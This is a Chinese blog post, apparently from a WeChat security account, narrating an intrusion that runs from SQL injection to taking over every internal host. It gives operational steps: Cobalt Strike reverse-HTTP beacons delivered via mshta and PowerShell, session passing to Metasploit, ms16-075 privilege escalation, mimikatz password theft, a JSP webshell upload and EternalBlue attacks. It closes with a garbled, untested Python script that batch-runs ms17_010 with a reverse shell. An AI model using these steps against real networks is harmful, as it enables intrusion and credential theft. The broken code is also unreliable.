安全攻防 | 记一次sql注入到内网漫游

我们先在cs建立一个监听,host填写vps地址，端口随便定义

Windows/beacon_http/reverse_http

下一步就是生成一个HTML木马，ATTacks-packages-HTML我们选择刚才新建的那个监听，然后选择方法powershell

之后就是选择你刚刚生成的木马，在你的vps上建立一个下载链接

在目标机器上通过mshta执行

然后这时候我们就会看到我们的CS里多出了一个目标

但是这个时候我们发现这个机器的权限是MSSQLSERVER，这对于我们来说是远远不够的，这个时候我们就要进行提权操作，CS中自带了几个提权的脚本，你也可以通过插件来获取其他提权脚本，但是我用CS的脚本进行提权都以失败告终，所以我需要把这个session传输到MSF里面

这一步是走向内网的第一步，也可以说是打点渗透的最后一步，可以说是非常重要的了，我们首先需要在CS中建立一个全新的监听，以便于session的传输

这个监听HOST填写你的vps，port随意，这里我的msf装在了vps上，所以我们打开vps，新建一个screen，运行msf,然后选择exploit/multi/handler之后我们设置payload，设置成和cs对应的如图所示

Windows/foreign/reverse_tcp

之后就是设置LHOST和LPORT，由于我的CS监听设置的地址就是vps的地址，所以我们在vps上监听0.0.0.0就可以，然后lport写刚刚你在cs上设置的port,一切设置完成我们先在msf上run起来，之后在cs上选择刚刚上线的机器，在beaconshell中输入spawn+刚刚你设置的msf监听名字就可以了，过一会儿我们就能看到msf中有机器上线

下一步就是利用msf提权，这里我们先把这个session放到后台，用bg命令就可以

之后我们用这个插件 post/multi/recon/local_exploit_suggester,进去之后我们set session * *就是刚刚你msf监听到的那个session的序号，这个插件就会自动检测目标系统版本以及可以利用的提权脚本，我们运行一下试试

可以看到，这些脚本就是可用的，这里我用了最后一个ms16-075这个漏洞

可以看到，提权成功，返回了一个新的system权限的session，下面我们尝试通过msf把这个session注入回到cs中使用

exploit/windows/local/payload_inject

把payload设置成我们cs建立的第一个监听的payload即

windows/meterpreter/reverse_http

然后设置host，port以及要传回去的session

我们可以看到CS上返回了一个system权限的shell

这个时候我们就可以愉快的使用mimikatz等工具来把administrator的密码偷来

但是有的机器改了RDP服务的端口怎么办呢，我们可以用cs的进程管理，找到rdp服务的PID，然后在beacon中输入powershell netstat -ano，就可以找到这个PID对应的端口了

我们拿到了一台机器，如何进行下一步的内网嗅探呢，cs中自带了一个portscan，当然你也可以通过socks把nmap，msf之类的带入到内网，这里我们就用cs自带的工具

我们可以看到他的内网比较简单，我进去转了一圈发现也只有一些打印机，路由器，还有一个oracle，我们通过受害机的浏览器中保存的密码进入到了其中，新建项目即可传war包，上传jsp木马，还有就是剩下几台445的windows主机了，由于我比较懒，就不把msf带入了，直接传一个ms17010的利用工具

至此，内网全部主机沦陷，打完收工，内网方面错综复杂，大家可以注意一些未授权访问啊，弱口令啊，浏览器保存的密码啊，整理出属于这个网段的密码字典，然后密码复用，细心总会有意外惊喜

最后，贴上一个自己写的ms17010批量工具，是刚刚利用的时候突发奇想写的，还没调试，希望各位大佬不要笑话，有时间帮小弟调试修改一下，在这里给大家磕头了

import sysimport osfor a in range (0,256):    a = str(a)    ip = "xx.xx.xx.""+a+"    def ms(config):        config=open('ms17010.rc','w')        config.write('use exploit/windows/smb/ms17_010_eternalblue'+"n")        config.write('set PAYLOAD windows/x64/meterpreter/reverse_tcp'+"n")        config.write('set RHOST '+ip+"n")        config.write('set LHOST "445"n')        config.write('exploit'+"n")    ms('')def main():    mg=os.system('msfconsole -r /root/ms17010.rc')if __name__ == '__main__':    main()

-END-

扫描下方 二维码 加入我们吧！

原文始发于微信公众号（betasec）：安全攻防 | 记一次sql注入到内网漫游